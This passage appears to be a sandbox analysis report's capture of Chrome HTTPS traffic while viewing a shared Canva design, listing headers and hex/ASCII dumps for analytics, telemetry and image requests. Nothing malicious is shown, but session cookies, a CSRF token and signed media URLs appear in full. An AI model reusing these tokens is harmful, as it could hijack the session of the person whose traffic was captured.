                                                                                                                                                                                                                                                                    x-amz-id-2: 4wQTx1HF4OFU8sya2S9lGbwYv0iutGJjAYSx1rNw6E0YMlOU3BXz5G/JAJG2R2k1Pp+lOLkOegM=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 0MKV62DE80HMRVQH
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 8S.pPh6KDLDLZ9gqa0n.3_HnZ1cHr38g
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC360INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 44 30 44 25 32 46 5a 4c 52 44 74 33 31 6f 47 33 39 25 32 42 36 6d 4d 4e 42 78 6a 34 39 76 5a 63 65 57 64 70 49 33 71 32 52 66 67 43 6c 58 5a 25 32 46 71 62 6b 66 66 25 32 42 67 36 75 75 25 32 46 41 74 78 25 32 42 74 5a 38 42 68 4c 79 70 36 69 35 68 73 34 46 55 39 25 32 42 4e 69 25 32 46 45 47 56 49 4b 53 55 71 77 38 44 79 38 66 72 63 70 61 51 73 54 41 55 6c 73 4e 52 67 44 54 75 4e 71 71 4c 57 48 33 51 4c 47 47 36 48 59 77 54 38 78 66 73 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D0D%2FZLRDt31oG39%2B6mMNBxj49vZceWdpI3q2RfgClXZ%2Fqbkff%2Bg6uu%2FAtx%2BtZ8BhLyp6i5hs4FU9%2BNi%2FEGVIKSUqw8Dy8frcpaQsTAUlsNRgDTuNqqLWH3QLGG6HYwT8xfs%3D"}],"group":"cf-nel","max_a
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC470INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 36 20 33 36 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 41 43 33 33 22 20 64 3d 22 4d 32 37 2e 32 38 37 20 33 34 2e 36 32 37 63 2d 2e 34 30 34 20 30 2d 2e 38 30 36 2d 2e 31 32 34 2d 31 2e 31 35 32 2d 2e 33 37 31 4c 31 38 20 32 38 2e 34 32 32 6c 2d 38 2e 31 33 35 20 35 2e 38 33 34 61 31 2e 39 37 20 31 2e 39 37 20 30 20 30 20 31 2d 32 2e 33 31 32 2d 2e 30 30 38 20 31 2e 39 37 31 20 31 2e 39 37 31 20 30 20 30 20 31 2d 2e 37 32 31 2d 32 2e 31 39 34 6c 33 2e 30 33 34 2d 39 2e 37 39 32 2d 38 2e 30 36 32 2d 35 2e 36 38 31 61 31 2e 39 38 20 31 2e 39 38 20 30 20 30 20 31 2d 2e 37 30 38 2d 32 2e 32
                                                                                                                                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#FFAC33" d="M27.287 34.627c-.404 0-.806-.124-1.152-.371L18 28.422l-8.135 5.834a1.97 1.97 0 0 1-2.312-.008 1.971 1.971 0 0 1-.721-2.194l3.034-9.792-8.062-5.681a1.98 1.98 0 0 1-.708-2.2


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    110192.168.2.1249836104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC2495OUTPOST /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Content-Length: 8566
                                                                                                                                                                                                                                                                    X-Canva-Brand: BAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-App: design_viewer
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    X-Canva-Build-Sha: 4aaacc3
                                                                                                                                                                                                                                                                    X-Csrf-Token: m65uuiM4hOHpo06dgSPhRqPEhdCRKiuvQOasLfvHE7DP5kTUrBM4kf_aI1UofOUgkerkC_LfxNF6gOeRLqtMopdba-0
                                                                                                                                                                                                                                                                    X-Canva-User: UAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-Analytics: AAMAA1dFQgA=
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                    X-Canva-Request: recordanalyticseventbatch
                                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                    X-Canva-Locale: en
                                                                                                                                                                                                                                                                    X-Canva-Build-Name: 20241118-21
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO [TRUNCATED]
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC8566OUTData Raw: 7b 22 41 22 3a 5b 7b 22 41 3f 22 3a 22 44 22 2c 22 41 22 3a 7b 22 41 22 3a 22 36 37 33 32 32 33 38 64 2d 30 31 63 32 2d 34 35 37 64 2d 38 36 62 61 2d 33 65 37 35 38 36 39 32 34 37 62 66 22 2c 22 45 22 3a 22 32 30 32 34 2d 31 31 2d 32 30 54 31 35 3a 30 31 3a 34 32 2e 33 35 32 5a 22 2c 22 46 22 3a 22 32 30 32 34 2d 31 31 2d 32 30 54 31 35 3a 30 31 3a 34 34 2e 36 36 38 5a 22 2c 22 48 22 3a 22 65 6e 22 2c 22 49 22 3a 7b 22 41 22 3a 22 55 53 22 7d 2c 22 4a 22 3a 22 57 45 42 22 2c 22 4b 22 3a 7b 22 57 4b 4c 55 4f 22 3a 22 41 22 2c 22 57 4b 44 55 49 22 3a 22 41 22 2c 22 56 53 57 4c 4f 22 3a 22 42 22 2c 22 55 54 43 55 49 22 3a 22 42 22 2c 22 54 4f 4d 4c 4f 22 3a 22 41 22 2c 22 52 52 53 43 32 22 3a 22 43 22 2c 22 50 52 54 43 32 22 3a 22 42 22 2c 22 50 52 46 44 4f
                                                                                                                                                                                                                                                                    Data Ascii: {"A":[{"A?":"D","A":{"A":"6732238d-01c2-457d-86ba-3e75869247bf","E":"2024-11-20T15:01:42.352Z","F":"2024-11-20T15:01:44.668Z","H":"en","I":{"A":"US"},"J":"WEB","K":{"WKLUO":"A","WKDUI":"A","VSWLO":"B","UTCUI":"B","TOMLO":"A","RRSC2":"C","PRTC2":"B","PRFDO
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC1071INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:49 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e595149498a41e3-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                                    x-request-id: 8e595149498a41e3
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0pkILwn%2B8mrX64m6SZiigogaMsg2KINcjF06ocqWng4fJpZJww7MISm%2Bg%2BDgRntPUdBcF%2BEjRP%2FsFaFFhmzrOa6gM%2Buspjw5rZn6UG3shKk%2BPaL8cKCFYM1Ent4prJ0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC28INData Raw: 31 36 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 16'"])}while(1);</x>//{}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    111192.168.2.1249840104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC508OUTOPTIONS /v1/traces HTTP/1.1
                                                                                                                                                                                                                                                                    Host: telemetry.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:49 GMT
                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=fH5_S7oXNbthEnmbBmsc2AQTDlm4GvyMgM1wxYemhz0-1732114909-1.0.1.1-i32xz5KQOTAw2ay99s5RU5MSFKiIZjq2WsFw.KkY7BjFURieonVHDO2nfV2nSiFA8nh6n8QodqKbzY0hRDGxLQ; path=/; expires=Wed, 20-Nov-24 15:31:49 GMT; domain=.canva.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xu%2Fiq7fIKZ3WC00MDFLzGzsu0FzTo1yH02Pfl8prVWe4QEbKcS4qoWEuuFLpHV7wY8qUVJDVYEo65enBczDMFmCjNyYZ2HPJxJ61e4CnFOA7k1G7QyrLCQuVfuJNTtI5ZmTdmYo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Set-Cookie: _cfuvid=VQ2u4DVw4xXxP_3j_dsOzRrXRSVIZ6odt_JWS6Bg68g-1732114909829-0.0.1.1-604800000; path=/; domain=.canva.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 8e59514a4dc2447a-EWR


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    112192.168.2.1249841104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC933OUTGET /v2/image-resize/format:PNG/height:103/quality:100/uri:s3%3A%2F%2Fmedia-private.canva.com%2F_1h7c%2FMAGXBS_1h7c%2F1%2Fp.png/watermark:F/width:200?csig=AAAAAAAAAAAAAAAAAAAAACnFWDeI2NRpUVeqh9D2x3H-bJYfhhKLTqOrxo_xVEXT&exp=1732129969&osig=AAAAAAAAAAAAAAAAAAAAAOiwISUCqtQIuC3qHQC8BiIppp60e_dvY-XUn7C5tJ71&signer=media-rpc&x-canva-quality=thumbnail HTTP/1.1
                                                                                                                                                                                                                                                                    Host: media.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC1136INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:49 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59514aeeac438a-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Age: 5813
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:35 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 13:24:56 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept, Origin
                                                                                                                                                                                                                                                                    Cf-Bgj: imgq:85,h2pri
                                                                                                                                                                                                                                                                    Cf-Polished: origSize=7458
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_media
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    x-request-id: 8e58c35acc418ccd
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QdIxC4gSMzgxcGACa7IGVuXQPSmlJeAA%2FUjox5Jy1sgpT2SDf5cVbVzpmfWa9H5exJeHRlMnz0PdgRYb%2Ff338FbKX2bO1z%2B6j2TnWwY9dJbbRA8c6lmygaFP6ryFlz033g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC233INData Raw: 66 66 65 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c6 00 00 00 67 08 02 00 00 00 d4 b9 aa 41 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 0f b8 49 44 41 54 78 da ec dc cf 4b 14 61 1c c7 f1 f9 b5 4b 28 61 46 28 b9 84 5a d9 52 94 1d a2 a2 4b ff 4a 77 a1 0e 51 06 5d 3c f4 e3 54 5d a4 35 5a a8 93 74 c8 48 11 0c dc ac b6 2d 0b c1 75 49 b6 46 73 d6 1f 38 ab a3 6e 48 ea ba f3 eb f9 fa b8 ab 1e 84 59 15 f6 20 f2 79 f1 65 78 60 98 cb c3 9b 79 6e 8f 40 00 25 25 09 00 25 85 a4 00 49 c1 3e 87 b3 1f 4a 0b 49 01 92 02 24 05 48 0a 00 49 01 92 02 24 05 80 a4 00 49 01 92 02 40 52 80 a4 00 49 01 92 02 40 52 80 a4 00 49 01 20 29 40 52 80 a4 0e 1c c6 58 e1 e9 38 ee 6e 86 23 22 96 87 7a 90
                                                                                                                                                                                                                                                                    Data Ascii: ffePNGIHDRgAsRGBIDATxKaK(aF(ZRKJwQ]<T]5ZtH-uIFs8nHY yex`yn@%%%I>JI$HI$I@RI@RI )@RX8n#"z
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC1369INData Raw: 94 77 55 7b e1 ba 8c f2 50 15 92 f2 ec 29 bb 6a c6 06 d5 de fe 5f 91 fe e1 5e 8f 89 fc 18 fe 10 4b 24 b5 74 a1 2a 0e 55 21 29 cf 5f ce d4 cc c2 8d fb 6d 77 9e b4 df 7b f6 a6 d9 63 d6 5f 3d 6d 6f 0e f5 c4 c7 e6 88 c8 41 55 48 aa 48 52 13 fa fc e3 70 d7 6e e2 e8 fe a9 35 b5 7e 4c 68 a8 0a 49 15 4d 6a 5c 9f 7b f0 e2 bd 65 3b b4 93 9e 81 d4 cd d0 a7 bb e1 e8 d0 98 41 44 1b 51 21 29 24 55 24 29 23 b3 c8 cf c1 e9 d9 0c 1f be c8 99 56 66 71 e9 4f 4a 57 c7 d3 ba 91 79 1b 55 9b 5a fb 6e bf 8c de 6a fb 3c a4 cd 13 91 8b 7f 14 6e 6e f1 22 e6 9f af 3b bf b6 84 de 3d 0a 77 3d 0c 77 b6 3c ef 18 9d 9c 5d 5a c9 25 b5 e9 d1 c9 99 bf 53 c6 a5 86 aa eb c1 23 97 6b cb af d4 96 bf ea 88 e8 c6 3f 49 14 89 08 bb 87 6b 36 3c c9 b2 e4 53 e4 fc 28 7e bf c2 18 0b 54 57 5e 6b 6c b8
                                                                                                                                                                                                                                                                    Data Ascii: wU{P)j_^K$t*U!)_mw{c_=moAUHHRpn5~LhIMj\{e;ADQ!)$U$)#VfqOJWyUZnj<nn";=w=w<]Z%S#k?Ik6<S(~TW^kl
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC1369INData Raw: c7 8f 1f cf 9f 3f bf 63 c7 8e 5b b7 6e 5d bd 7a 95 f1 b5 6b d7 6c 7e ef de bd 75 eb d6 45 24 17 2e 5c b8 71 e3 c6 d0 d0 50 3a 51 8e 51 2a 21 f8 fa f5 6b 87 74 9e ea ea ea b7 6f df ca d9 b9 73 e7 4c 01 42 4f fa f6 ed 5b a2 11 4a 6d dd ba f5 d8 b1 63 c0 82 f8 ed db b7 4f 9f 3e 0d df 3b 77 ee 48 e4 97 2f 5f 3e 7d fa e4 17 8e 79 79 79 29 3d 28 0b fa b6 b6 b6 eb d7 af 9f 3c 79 d2 da 9e 9e 1e 98 82 d8 fe 05 05 05 0c 5e bd 7a 55 5b 5b 4b 53 53 53 f3 f8 f1 63 0b ed a9 dc b9 b0 e4 eb d7 af d8 23 6d 07 0e 1c 90 95 08 c6 da 07 0f 1e c4 86 a1 f9 f0 e1 c3 d1 a3 47 f9 62 cf fb e5 cb 97 cd da f0 d9 b3 67 b6 92 42 06 9f 3f 7f fe fe fd 7b d8 df bd 7b 57 ee e9 c9 72 69 67 75 c5 a3 78 96 2e 5d 6a 87 97 2f 5f 3a 8b 78 c8 62 db bf 7f 7f 67 67 27 63 1e 39 22 80 02 27 f6 ed db
                                                                                                                                                                                                                                                                    Data Ascii: ?c[n]zkl~uE$.\qP:QQ*!ktosLBO[JmcO>;wH/_>}yyy)=(<y^zU[[KSSSc#mGbgB?{{Wrigux.]j/_:xbgg'c9"'
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC1130INData Raw: 15 9d 2c c6 e7 30 43 08 5e 0c 3e be 91 ff 1c d6 0f 4b 67 16 a5 69 17 84 4d a1 f1 f0 ab 2a 92 21 ca 59 f7 c8 3a 6a ca a6 98 a6 5f 99 81 3c 0d d8 73 9e 24 92 1b 52 1f 6c bb a8 41 0f 66 19 0e 44 13 ab 2e 5b 02 6d 1c e1 2b 19 32 81 08 96 00 50 30 0b 7f a2 09 19 04 f0 c5 10 89 7c 27 8f ef c6 14 a7 98 0f a0 64 34 6a d1 83 92 81 d1 56 0f 41 b2 2b 17 42 09 42 99 39 75 0c ca 11 d6 ac a4 c0 6c 16 3e e4 4f e6 94 59 80 03 73 2d d9 28 6c 35 10 ab f0 8a 4a 8a 1e 99 e6 5e 6c 59 4b 27 3d 99 e2 2a 10 98 e2 64 2e 21 c5 1c 55 1d 44 2b 61 e8 67 8e db 70 43 80 93 90 64 44 49 0e 33 6e 0b 34 0b 0e 07 78 e8 91 1b 34 3b 00 3c b1 05 0e 30 47 26 e5 ac e8 df 2f be 0f 48 39 73 82 2b e8 6e 26 69 4b 31 c7 51 96 5d 61 75 67 08 1f 24 85 86 86 1e 29 97 5a 7d b9 91 42 e7 5b ac 2d 17 6e 50
                                                                                                                                                                                                                                                                    Data Ascii: ,0C^>KgiM*!Y:j_<s$RlAfD.[m+2P0|'d4jVA+BB9ul>OYs-(l5J^lYK'=*d.!UD+agpCdDI3n4x4;<0G&/H9s+n&iK1Q]aug$)Z}B[-nP
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    113192.168.2.1249842104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC934OUTGET /v2/image-resize/format:PNG/height:831/quality:100/uri:s3%3A%2F%2Fmedia-private.canva.com%2F_1h7c%2FMAGXBS_1h7c%2F1%2Fp.png/watermark:F/width:1600?csig=AAAAAAAAAAAAAAAAAAAAAIeRpJCdaNjD5eFqoIZKm5NiX2vhXgUuA39yzwgWYvzu&exp=1732129969&osig=AAAAAAAAAAAAAAAAAAAAAIh84Mq_eVXBwPrghDB-WvEJm2_Tf6oLeXfO68GWCD7S&signer=media-rpc&x-canva-quality=screen_2x HTTP/1.1
                                                                                                                                                                                                                                                                    Host: media.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC1141INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:50 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59514bae6343cd-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Age: 5813
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:36 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 13:24:57 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept, Origin
                                                                                                                                                                                                                                                                    Cf-Bgj: imgq:85,h2pri
                                                                                                                                                                                                                                                                    Cf-Polished: origSize=71565
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_media
